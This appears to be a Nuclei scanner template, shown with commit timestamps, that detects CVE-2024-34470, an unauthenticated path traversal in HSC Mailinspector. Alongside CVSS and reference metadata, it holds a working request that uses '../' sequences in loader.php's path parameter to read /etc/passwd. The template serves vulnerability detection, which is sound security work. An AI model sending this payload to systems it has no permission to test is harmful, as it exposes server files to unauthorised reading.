2024-05-30 12:04:18 +00:00
id : CVE-2024-34470
info :
name : HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion
author : topscoder
severity : high
description : |
An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.
reference :
- https://github.com/osvaldotenorio/CVE-2024-34470
- https://github.com/nomi-sec/PoC-in-GitHub
- https://github.com/fkie-cad/nvd-json-data-feeds
2024-05-30 13:26:04 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2024-34470
2024-05-30 12:04:18 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cwe-id : CWE-22
epss-score : 0.00043
epss-percentile : 0.0866
metadata :
2024-05-30 13:26:04 +00:00
verified : true
2024-06-07 10:04:29 +00:00
max-request : 2
2024-05-30 12:04:18 +00:00
fofa-query : "mailinspector/public"
tags : cve,cve2024,lfi,mailinspector,hsc
2024-05-30 13:26:04 +00:00
flow : http(1) && http(2)
2024-05-30 12:04:18 +00:00
http :
- method : GET
path :
- "{{BaseURL}}/mailinspector/login.php"
host-redirects : true
matchers :
- type : word
part : body
words :
- "Licensed to HSC TREINAMENTO"
- method : GET
path :
- "{{BaseURL}}/mailinspector/public/loader.php?path=../../../../../../../etc/passwd"
matchers-condition : and
matchers :
- type : regex
part : body
regex :
- "root:.*:0:0:"
- type : status
status :
- 200
2024-06-08 16:02:17 +00:00
# digest: 4a0a00473045022051184fed9b9a4b1966d32d775675ae1770f24224d547667500500ad3177f5476022100fc9e3a62f08e8debfd9a15e004208573ed4273bfd4d6f2d48e09f8a46bcff1ce:922c64590222798bb761d5b6d8e72950